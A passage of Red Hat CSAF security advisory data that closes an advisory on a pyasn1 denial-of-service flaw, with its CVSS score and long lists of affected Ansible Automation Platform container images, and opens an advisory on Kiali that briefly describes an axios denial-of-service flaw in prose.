"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
}
]
}
RHSA-2026:3105
Vulnerability from csaf_redhat - Published: 2026-02-23 17:14 - Updated: 2026-04-16 10:28A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Kiali 2.11.7 for Red Hat OpenShift Service Mesh 3.1\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
